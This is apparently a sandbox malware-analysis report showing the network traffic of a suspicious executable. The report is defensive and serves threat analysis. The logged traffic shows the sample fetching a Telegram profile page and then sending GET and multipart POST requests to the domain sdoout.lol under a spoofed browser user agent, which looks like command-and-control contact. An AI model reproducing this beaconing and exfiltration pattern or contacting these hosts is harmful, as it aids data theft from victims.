                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.687690020 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.687717915 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.687730074 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.688086033 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.695683956 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.794007063 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.802095890 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.802124023 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.802134991 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.804671049 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.810966015 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.843465090 CET4435906823.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.871244907 CET59068443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.906836033 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.913666010 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.913687944 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.913698912 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.913970947 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:57.922101021 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.029083967 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.036617994 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.036647081 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.036676884 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.036931038 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.044931889 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.143677950 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.151510000 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.151531935 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.151546001 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.151902914 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.158780098 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.259057045 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.267600060 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.267617941 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.267700911 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.268029928 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.276395082 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.379276991 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.391016960 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.391103029 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.391114950 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.391470909 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.410000086 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.512007952 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.519442081 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.519454956 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.519465923 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.519872904 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.530886889 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.627295971 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.635421991 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.635471106 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.635481119 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.635724068 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.645992994 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.747431040 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.764936924 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.764993906 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.765006065 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.765327930 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.774247885 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.878988981 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.888381004 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.888518095 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.888530016 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.888540983 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.888714075 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:58.945811987 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:59.011269093 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:59.051079035 CET4436257523.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:59.051474094 CET62575443192.168.2.923.209.72.26
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:07.243027925 CET4435906823.209.72.26192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:34.977139950 CET54058443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:34.977372885 CET54058443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:34.977689981 CET54058443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:34.977797031 CET54058443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.426085949 CET44354058172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.426983118 CET54058443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.464658022 CET54058443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.526314974 CET44354058172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.526341915 CET44354058172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.526371002 CET44354058172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.526381016 CET44354058172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.526972055 CET54058443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.527060986 CET54058443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.626358032 CET44354058172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.626957893 CET54058443192.168.2.9172.64.41.3
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.728127003 CET44354058172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.728533983 CET44354058172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.728816032 CET44354058172.64.41.3192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:56:35.729171991 CET54058443192.168.2.9172.64.41.3

                                                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:05.247021914 CET192.168.2.91.1.1.10xe35bStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:06.445692062 CET192.168.2.91.1.1.10x7b42Standard query (0)sdoout.lolA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:16.705373049 CET192.168.2.91.1.1.10x6d43Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:16.705533981 CET192.168.2.91.1.1.10x9a1Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:19.644326925 CET192.168.2.91.1.1.10xbcc3Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:19.644490957 CET192.168.2.91.1.1.10xf8f9Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:20.654613018 CET192.168.2.91.1.1.10x400cStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:20.655294895 CET192.168.2.91.1.1.10x34e5Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:30.709084988 CET192.168.2.91.1.1.10x86afStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:30.709347963 CET192.168.2.91.1.1.10x6c69Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:32.058831930 CET192.168.2.91.1.1.10x9583Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:32.059247017 CET192.168.2.91.1.1.10xb119Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.386143923 CET192.168.2.91.1.1.10x9f1eStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.386291981 CET192.168.2.91.1.1.10x48faStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.417248964 CET192.168.2.91.1.1.10x1421Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.417386055 CET192.168.2.91.1.1.10x3a89Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.439743996 CET192.168.2.91.1.1.10x6c84Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.439997911 CET192.168.2.91.1.1.10x822dStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.446197033 CET192.168.2.91.1.1.10x3a2dStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.446428061 CET192.168.2.91.1.1.10x4364Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.061669111 CET192.168.2.91.1.1.10x98f3Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.062066078 CET192.168.2.91.1.1.10x51adStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.395292044 CET192.168.2.91.1.1.10x69aaStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.395447969 CET192.168.2.91.1.1.10xc7adStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.395961046 CET192.168.2.91.1.1.10x4d71Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.396121979 CET192.168.2.91.1.1.10xec15Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.409914017 CET192.168.2.91.1.1.10x6632Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.410156965 CET192.168.2.91.1.1.10x2c65Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:05.253885031 CET1.1.1.1192.168.2.90xe35bNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:06.470451117 CET1.1.1.1192.168.2.90x7b42No error (0)sdoout.lol116.203.14.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:16.711982965 CET1.1.1.1192.168.2.90x6d43No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:16.712399006 CET1.1.1.1192.168.2.90x9a1No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:19.651153088 CET1.1.1.1192.168.2.90xf8f9No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:19.651190996 CET1.1.1.1192.168.2.90xbcc3No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:19.651190996 CET1.1.1.1192.168.2.90xbcc3No error (0)plus.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:20.661823034 CET1.1.1.1192.168.2.90x400cNo error (0)play.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:30.716033936 CET1.1.1.1192.168.2.90x6c69No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:30.716120005 CET1.1.1.1192.168.2.90x86afNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:31.372653008 CET1.1.1.1192.168.2.90x66e8No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:31.372653008 CET1.1.1.1192.168.2.90x66e8No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:31.373529911 CET1.1.1.1192.168.2.90x3ab2No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:32.066170931 CET1.1.1.1192.168.2.90xb119No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:32.066240072 CET1.1.1.1192.168.2.90x9583No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.392899990 CET1.1.1.1192.168.2.90x9f1eNo error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.392899990 CET1.1.1.1192.168.2.90x9f1eNo error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.392899990 CET1.1.1.1192.168.2.90x9f1eNo error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.392899990 CET1.1.1.1192.168.2.90x9f1eNo error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.425167084 CET1.1.1.1192.168.2.90x1421No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.425240040 CET1.1.1.1192.168.2.90x3a89No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.446715117 CET1.1.1.1192.168.2.90x822dNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.447197914 CET1.1.1.1192.168.2.90x6c84No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.452878952 CET1.1.1.1192.168.2.90x3a2dNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:33.453026056 CET1.1.1.1192.168.2.90x4364No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.068375111 CET1.1.1.1192.168.2.90x98f3No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.068375111 CET1.1.1.1192.168.2.90x98f3No error (0)googlehosted.l.googleusercontent.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.069802999 CET1.1.1.1192.168.2.90x51adNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.401983023 CET1.1.1.1192.168.2.90x69aaNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.401983023 CET1.1.1.1192.168.2.90x69aaNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.402717113 CET1.1.1.1192.168.2.90xc7adNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.402744055 CET1.1.1.1192.168.2.90x4d71No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.402744055 CET1.1.1.1192.168.2.90x4d71No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.402905941 CET1.1.1.1192.168.2.90xec15No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.417005062 CET1.1.1.1192.168.2.90x2c65No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.417140961 CET1.1.1.1192.168.2.90x6632No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:35.417140961 CET1.1.1.1192.168.2.90x6632No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                          • t.me
                                                                                                                                                                                                                                                                                          • sdoout.lol
                                                                                                                                                                                                                                                                                          • www.google.com
                                                                                                                                                                                                                                                                                          • apis.google.com
                                                                                                                                                                                                                                                                                          • play.google.com
                                                                                                                                                                                                                                                                                          • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                          • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          • https:
                                                                                                                                                                                                                                                                                            • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                            • c.msn.com
                                                                                                                                                                                                                                                                                            • browser.events.data.msn.com

                                                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          0192.168.2.949706149.154.167.994437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:06 UTC85OUTGET /w211et HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: t.me
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:06 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:06 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                          Content-Length: 12298
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Set-Cookie: stel_ssid=8d7efc459bab8b20a2_3182426351969748684; expires=Tue, 31 Dec 2024 14:55:06 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Cache-control: no-store
                                                                                                                                                                                                                                                                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:06 UTC12298INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 77 32 31 31 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w211et</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          1192.168.2.949707116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:07 UTC183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:07 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          2192.168.2.949708116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:08 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----xt2dbs0r1n7yua1db1ny
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
